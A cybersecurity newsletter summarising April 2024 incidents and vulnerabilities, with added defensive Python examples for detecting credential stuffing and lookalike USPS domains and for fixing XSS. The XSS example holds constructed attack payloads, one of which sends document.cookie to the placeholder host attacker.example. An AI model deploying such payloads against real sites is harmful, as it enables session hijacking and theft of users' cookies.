CISO Daily Update - April 29, 2024
NEW DEVELOPMENTS
Okta Warns of Unprecedented Surge in Proxy-Driven Credential Stuffing Attacks
Source: The Hacker News
Okta raised the alarm over an unprecedented surge in credential-stuffing attacks against online services, driven by the easy availability of residential proxy services, lists of previously stolen credentials, and automated attack tooling. The attacks route login attempts through residential ISP address space using compromised devices unknowingly conscripted into botnets, so the malicious traffic appears to originate from legitimate home connections rather than from data centers or known anonymizers. Okta observed millions of proxy-based credential-stuffing attempts between April 19 and 26, 2024, likely from infrastructure linked to the recent global brute-force campaigns. To reduce account-takeover risk, Okta recommends enforcing strong passwords, multi-factor authentication, geofencing, and FIDO-compliant passkeys to replace password-based authentication.
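The detection problem the Okta item raises is that per-IP rate limits and IP blocklists never fire when each attempt comes from a different residential address. The following is an added example, not Okta's detection logic, of the batch-level signals a SOC can compute instead: failure volume, the ratio of distinct source IPs to attempts, and the number of distinct ASNs, plus a per-account view that lists accounts being tried from several networks at once. The log format, the IP ranges, the ASNs and the thresholds are all constructed or assumed for the example.

```python
"""Flag proxy-driven credential stuffing in authentication logs.

Added example for this newsletter item; it is not Okta's detection logic.
The log line format is constructed for the example:
    <epoch> user=<account> ip=<source IP> asn=<AS of the source IP> result=<ok|fail>
The asn field stands in for whatever IP-to-ASN enrichment the SIEM provides.
All thresholds are assumptions to be tuned against the tenant's baseline.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class AuthEvent:
    ts: int
    user: str
    src_ip: str
    asn: str
    success: bool


def parse_line(line: str) -> AuthEvent:
    ts, *pairs = line.split()
    f = dict(p.split("=", 1) for p in pairs)
    return AuthEvent(int(ts), f["user"], f["ip"], f["asn"], f["result"] == "ok")


def classify(events, min_attempts=20, max_success_rate=0.15,
             min_ip_spread=0.5, min_asns=5):
    """Classify one batch of events (e.g. a 10-minute window for one tenant).

    Proxy-driven stuffing differs from classic brute force: the failures are
    spread over many source IPs in many residential ASNs, each IP sending only
    a handful of attempts, so per-IP rate limits and IP blocklists never fire.
    The batch-level signal is therefore a high failure volume with a high
    ratio of distinct IPs to attempts and many distinct ASNs.
    """
    n = len(events)
    stats = {"attempts": n}
    if n == 0:
        return "benign", stats
    failures = sum(1 for e in events if not e.success)
    ips = {e.src_ip for e in events}
    asns = {e.asn for e in events}
    stats.update(
        success_rate=round(1 - failures / n, 3),
        distinct_ips=len(ips),
        ip_spread=round(len(ips) / n, 3),  # 1.0 means every attempt used a fresh IP
        distinct_asns=len(asns),
        distinct_users=len({e.user for e in events}),
    )
    if n >= min_attempts and stats["success_rate"] <= max_success_rate:
        if stats["ip_spread"] >= min_ip_spread and len(asns) >= min_asns:
            return "credential_stuffing", stats
        if len(ips) <= 2:
            return "brute_force", stats
    return "benign", stats


def targeted_accounts(events, min_asns=3):
    """Accounts whose attempts arrive from at least min_asns different networks.

    A real user rarely spans three ISPs inside one window; an account on a
    stolen credential list replayed through a proxy pool does. These are the
    accounts to force a password reset or step-up MFA on.
    """
    by_user = {}
    for e in events:
        by_user.setdefault(e.user, set()).add(e.asn)
    return sorted(u for u, a in by_user.items() if len(a) >= min_asns)


# Constructed samples. IPs are from RFC 5737 documentation ranges and ASNs from
# the RFC 5398 documentation range; they do not refer to real networks.
def sample_stuffing():
    asns = ["AS64496", "AS64497", "AS64498", "AS64499", "AS64500", "AS64501"]
    lines = []
    for i in range(30):  # 30 attempts, 30 IPs, 10 accounts, 2 hits on valid creds
        result = "ok" if i in (4, 19) else "fail"
        lines.append(f"{1713500000 + 7 * i} user=u{i % 10}@example.com "
                     f"ip=203.0.113.{i + 1} asn={asns[i % 6]} result={result}")
    return [parse_line(l) for l in lines]


def sample_brute_force():
    return [parse_line(f"{1713500000 + 3 * i} user=ceo@example.com "
                       f"ip=198.51.100.7 asn=AS64502 result=fail") for i in range(25)]


def sample_benign():
    return [parse_line(f"{1713500000 + 20 * i} user=alice@example.com "
                       f"ip=192.0.2.10 asn=AS64503 result={r}")
            for i, r in enumerate(("fail", "fail", "ok"))]


if __name__ == "__main__":
    for name, batch in (("stuffing", sample_stuffing()),
                        ("brute force", sample_brute_force()),
                        ("benign", sample_benign())):
        verdict, stats = classify(batch)
        print(f"{name:12s} -> {verdict:20s} {stats} targeted={targeted_accounts(batch)}")
```

The stuffing batch is the case the Okta advisory describes: 30 attempts from 30 addresses in six networks, two of which succeed. No single IP would trip a rate limit, but the batch is unmistakable, and `targeted_accounts` returns the ten accounts that should get a forced reset. The brute-force batch (one IP, one account, 25 failures) is what legacy controls already catch, and the benign batch is a user mistyping a password twice.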
Hackers May Have Accessed Thousands of Accounts on the California State Welfare Platform
Source: Security Affairs
Threat actors accessed more than 19,000 accounts on California's BenefitsCal welfare platform by reusing passwords stolen from unrelated third-party sites, a credential-stuffing attack rather than a breach of the platform itself. The accounts may have been accessed between March 1, 2023, and February 13, 2024; exposed data includes names, addresses, and partial Social Security numbers. BenefitsCal has deactivated the affected accounts, launched an investigation, and added security measures including two-factor authentication. Users are urged to choose strong, unique passwords and to monitor their accounts for suspicious activity.
US Post Office Phishing Sites Get As Much Traffic As the Real One
Source: Bleeping Computer
Security researchers found a proliferation of phishing domains mimicking the United States Postal Service (USPS) website that together draw nearly as much traffic as the legitimate site, and more during holiday periods. These combosquatting domains (the brand name combined with extra words such as "tracking" or "delivery") replicate USPS branding and functions such as package tracking to trick victims into entering credentials or payment details. The campaigns include fake storefronts purporting to sell stamps and gifts, and SMS lures that send users to tracking pages hosting malicious JavaScript. Between October 2023 and February 2024, more than 1.1 million queries were made to the fraudulent domains across popular TLDs such as .com, .top, and .shop.
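Combosquatting is easy to spot mechanically once you separate the registrable domain from its subdomains, which is what the following added example does over a batch of queried names. It is not the cited researchers' tooling; the sample names are constructed, and the "last two labels" split used to find the registrable domain is a simplification (production code should use a public suffix list so that names under suffixes like co.uk are handled correctly).

```python
"""Flag combosquatting and related lookalike domains for a brand.

Added example, not the researchers' tooling from the cited report. Input names
are constructed. Registrable-domain extraction here is a naive "last two labels"
split (an assumption); production code should use a public suffix list.
"""
from collections import Counter


def split_name(name):
    """Return (registrable_domain, subdomain_labels) for a DNS name."""
    labels = name.lower().strip().rstrip(".").split(".")
    if len(labels) < 2:
        return None, labels
    return ".".join(labels[-2:]), labels[:-2]


def classify_domain(name, brand="usps", allow=frozenset({"usps.com"})):
    """Classify one queried name relative to a brand token.

    combosquat       brand token combined with extra words in the registrable
                     label, e.g. usps-tracking-update.top (the report's pattern)
    tld_squat        exact brand label under a different TLD, e.g. usps.shop
    subdomain_squat  brand appears only in subdomain labels of an unrelated
                     registrable domain, e.g. usps.com.parcel-status.top
    """
    reg, sub = split_name(name)
    if reg is None:
        return "unrelated"
    if reg in allow:
        return "legitimate"
    sld = reg.split(".")[0]
    if brand in sld:
        return "tld_squat" if sld == brand else "combosquat"
    if any(brand in label for label in sub):
        return "subdomain_squat"
    return "unrelated"


def scan(names, **kw):
    """Summarise a batch of queried names: verdict counts plus the flagged names."""
    verdicts = {n: classify_domain(n, **kw) for n in names}
    flagged = sorted(n for n, v in verdicts.items() if v.endswith("squat"))
    return Counter(verdicts.values()), flagged


# Constructed sample of names as they might appear in DNS or proxy logs.
SAMPLE_QUERIES = [
    "www.usps.com",
    "tools.usps.com",
    "usps-tracking-update.top",
    "uspsstamps.shop",
    "usps.shop",
    "usps.com.parcel-status.top",
    "example.com",
    "localhost",
]

if __name__ == "__main__":
    counts, flagged = scan(SAMPLE_QUERIES)
    print(counts)
    for n in flagged:
        print(f"{classify_domain(n):16s} {n}")
```

The three verdict classes matter because they need different responses: a combosquat or TLD squat is a registration to report to the registrar and block at the resolver, while a subdomain squat is usually a throwaway host under a domain the attacker controls, so the registrable domain itself is the thing to block. Substring matching on a short token such as "usps" will hit unrelated words that contain it; review flagged names before turning them into blocklist entries.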
FBI: Fraudsters Using Fake Online Dating Verification Apps to Scam Lovers
Source: The Record
The FBI is alerting the public to a new romance scam in which cybercriminals lure online daters into using fake "verification" services that steal personal and financial information. The scheme begins by moving victims off legitimate dating platforms onto encrypted messaging, where the scammer claims a "free" verification process can vet users against predators. A fake website then asks for details such as name, email address, phone number, and payment card data, supposedly for safety checks. In reality the scheme harvests the data for identity theft and also enrolls victims in fraudulent paid dating services with recurring billing. The tactic works because it turns a genuine safety concern of online daters into the pretext for handing over exactly the data a fraudster needs.
Bogus npm Packages Used to Trick Software Developers into Installing Malware
Source: The Hacker News
A social engineering operation is using fake job interviews to trick software developers into installing malicious npm packages that deliver a Python backdoor. The DEV#POPPER campaign, assessed as potentially linked to North Korean threat actors, points candidates at GitHub repositories hosting seemingly benign Node.js modules as part of the "interview"; the module acts as a loader that fetches and executes the Python implant, giving attackers command execution, file theft, keystroke logging, and persistent access on the developer's workstation. Treat any code an interviewer asks you to run as untrusted and run it only in a disposable environment; stressful situations such as job interviews are exactly when that discipline lapses.
Kaiser’s Website Tracking Tools May Have Compromised Data on 13 Million Customers
Source: The Record
Kaiser Permanente is notifying over 13 million customers about a potential data compromise involving their personal information shared with third-party vendors. The information may include IP addresses and navigation details on Kaiser websites and was possibly accessed through tracking software. While financial data and social security numbers were not affected, the breach involved vendors like Google, Microsoft Bing, and X (formerly Twitter). Despite no reported misuse, Kaiser is initiating notifications starting in May. This incident follows prior scrutiny over Kaiser's use of tracking tools, with ongoing litigation and broader concerns about healthcare providers' use of such technologies.
Thousands of Qlik Sense Servers Open to Cactus Ransomware
Source: Darkreading
Despite warnings and patches issued by Qlik last year, thousands of Qlik Sense servers remain exposed to the exploits used by the Cactus ransomware group. The vulnerabilities, disclosed in August and September 2023, allow remote attackers to execute arbitrary code on affected systems. Although the Cactus group has been exploiting them for months, a recent scan found more than 3,000 Internet-accessible Qlik Sense servers still susceptible, with notable concentrations in the US, Italy, Brazil, the Netherlands, and Germany. Fox-IT and the Dutch Institute for Vulnerability Disclosure (DIVD) are notifying potential victims and collaborating under Project Melissa to disrupt Cactus operations, and the Shadowserver Foundation is issuing alerts warning organizations that unremediated servers have a high likelihood of compromise. For a server that has been exposed since last year, patching alone is not enough: check it for signs of prior compromise before trusting it again.
Brokewell Android Malware Supports an Extensive Set of Device Takeover Capabilities
Source: Security Affairs
Researchers uncovered a new Android banking trojan called Brokewell that implements an extensive set of device takeover features. Distributed via fake app updates, Brokewell can overlay credential-stealing screens on legitimate apps, capture cookies, log every user interaction including touches and text entry, and exfiltrate device data such as call logs and location. Most concerning, it supports remote device control: the attacker can stream the victim's screen and simulate taps, swipes, scrolls, and app launches on the live device, which defeats anti-fraud controls that trust a transaction because it came from the enrolled handset. Brokewell exemplifies the growing criminal demand for full device takeover malware as a way around those defenses.
VULNERABILITIES TO WATCH
Windows Kernel EoP Vulnerability (CVE-2024-21345) Gets PoC Exploit Code
Source: SecurityOnline.info
Security researcher Gabe Kirkpatrick published proof-of-concept (PoC) exploit code for CVE-2024-21345, a high-severity Windows Kernel elevation-of-privilege vulnerability. An authenticated local attacker can use it to escalate to SYSTEM, gaining full control of the affected system. The flaw, fixed in the February 2024 Patch Tuesday updates, is a double-fetch issue in the NtQueryInformationThread system call: the kernel reads a value from user-controlled memory twice, and a race that changes the value between the two reads lets the attacker corrupt kernel memory. With public exploit code now available, installing the February updates should be treated as urgent.
Mitel Issues Critical Fixes for XSS Vulnerabilities in MiContact Center Business
Source: SecurityOnline.info
Mitel addressed two high-severity cross-site scripting (XSS) flaws in its MiContact Center Business platform that could allow unauthenticated attackers to run arbitrary script in the browsers of the application's users. The first, a stored XSS in the Ignite component (CVSS 9.3), lets an attacker inject a script that executes whenever other users open the affected application pages. The second, a reflected XSS in the Legacy Chat feature (CVSS 8.1), requires tricking a victim into visiting a crafted URL, which then executes the attacker's script in the victim's session. Both vulnerabilities affect versions up to 10.0.0.4 and are remediated in 10.1.0.1 or through hotfixes KB560730 and KB560732. Successful exploitation could lead to data theft, session or account hijacking, and further attacks on contact center systems. Mitel urges customers to patch promptly or, where patching must wait, to disable the vulnerable legacy components.
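The two bug classes in the Mitel advisory, stored and reflected XSS, both come down to untrusted text being written into HTML without encoding for the context it lands in. The following added example shows each in a minimal chat page, the vulnerable rendering path next to its hardened form. It is not Mitel's code and does not reproduce the MiContact Center Business flaws; the page fragments, messages, and payloads are constructed, and only the Python standard library is used.

```python
"""Reflected and stored XSS: vulnerable rendering next to its hardened form.

Added example for this advisory item. It is not Mitel's code and does not
reproduce the MiContact Center Business flaws; it shows the two bug classes
the advisory names in a minimal chat page. All fragments are constructed.
"""
import html
from urllib.parse import parse_qs, quote, urlsplit


def esc(s):
    """Encode for the HTML text and attribute contexts (& < > " ')."""
    return html.escape(s, quote=True)


def greet_vulnerable(query_string):
    """Reflected XSS: a URL parameter is copied into the page unescaped."""
    name = parse_qs(query_string).get("name", [""])[0]
    return f"<p>Welcome back, {name}</p>"


def greet_safe(query_string):
    """Same page with output encoding applied at the point of insertion."""
    name = parse_qs(query_string).get("name", [""])[0]
    return f"<p>Welcome back, {esc(name)}</p>"


def transcript_vulnerable(messages):
    """Stored XSS: text written by one party is replayed to every later viewer
    (an agent, a supervisor) without encoding, so the payload fires for them."""
    return "\n".join(f"<li><b>{m['from']}</b>: {m['text']}</li>" for m in messages)


def transcript_safe(messages):
    return "\n".join(f"<li><b>{esc(m['from'])}</b>: {esc(m['text'])}</li>" for m in messages)


def safe_href(url):
    """Attribute context needs more than escaping: a javascript: URL survives
    html.escape unchanged, so the scheme is allowlisted first."""
    if urlsplit(url).scheme.lower() not in ("http", "https"):
        return "#"
    return esc(url)


SECURITY_HEADERS = {
    # Defence in depth if an encoding gap slips through: inline script is blocked.
    "Content-Security-Policy": "default-src 'self'; script-src 'self'; object-src 'none'",
    "X-Content-Type-Options": "nosniff",
}

# Constructed payloads: a reflected one in the query string and a stored one
# posted as a chat message. attacker.example is a reserved documentation name.
REFLECTED = "name=" + quote("<script>alert(document.cookie)</script>")
STORED = [
    {"from": "customer", "text": "Where is my order?"},
    {"from": "customer",
     "text": '<img src=x onerror="fetch(\'https://attacker.example/\'+document.cookie)">'},
]

if __name__ == "__main__":
    print(greet_vulnerable(REFLECTED))
    print(greet_safe(REFLECTED))
    print(transcript_vulnerable(STORED))
    print(transcript_safe(STORED))
    print(safe_href("javascript:alert(1)"), safe_href("https://example.com/?a=1&b=2"))
```

The fix is the same for both classes: encode on output, for the exact context (text, attribute, URL), not on input. Input filtering is what the "legacy" components in advisories like this one usually relied on, and it fails as soon as a new payload shape appears.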
SPECIAL REPORTS
Top 5 Breaches Caused by Infostealer Infections
Source: Infostealers
Major organizations including Orange Spain, CircleCI, Airbus suppliers, and even hacker forums have suffered breaches that began with infostealer malware on an employee's system. These quiet infections harvest saved credentials and session data, enabling threat actors to hijack accounts, disrupt operations (as with the BGP misconfiguration at Orange Spain), reach proprietary databases and intellectual property, and escalate privileges for wider network intrusion. High-profile incidents such as the Uber breach show infostealers' role as an initial access vector that paves the way for more destructive attacks. Countermeasures include continuous monitoring for infostealer indicators and leaked-credential exposure, strict access controls with phishing-resistant MFA, and proactive threat hunting, all of which are needed to keep a single infected endpoint from becoming an enterprise breach.
Most People Still Rely on Memory or Pen and Paper for Password Management
Source: Help Net Security
A global survey by Bitwarden finds that poor password habits persist despite growing security awareness: 25% of respondents reuse passwords across more than 10 accounts, 36% base credentials on publicly available personal information, and most still manage passwords by memory or on pen and paper. While 68% feel prepared against AI-powered attacks, risky practices such as public Wi-Fi use and not enabling 2FA undermine that confidence, and 19% report having suffered a security breach due to poor password hygiene. There are positive trends: password manager adoption is driving more secure behavior at home (45% report reduced password reuse) and at work (51% report being more security conscious), and 2FA usage is rising alongside organizational efforts after cyberattacks. The passwordless future also shows promise, with 52% saying they understand the benefits of passkeys and 62% saying they would trust a company more for implementing them.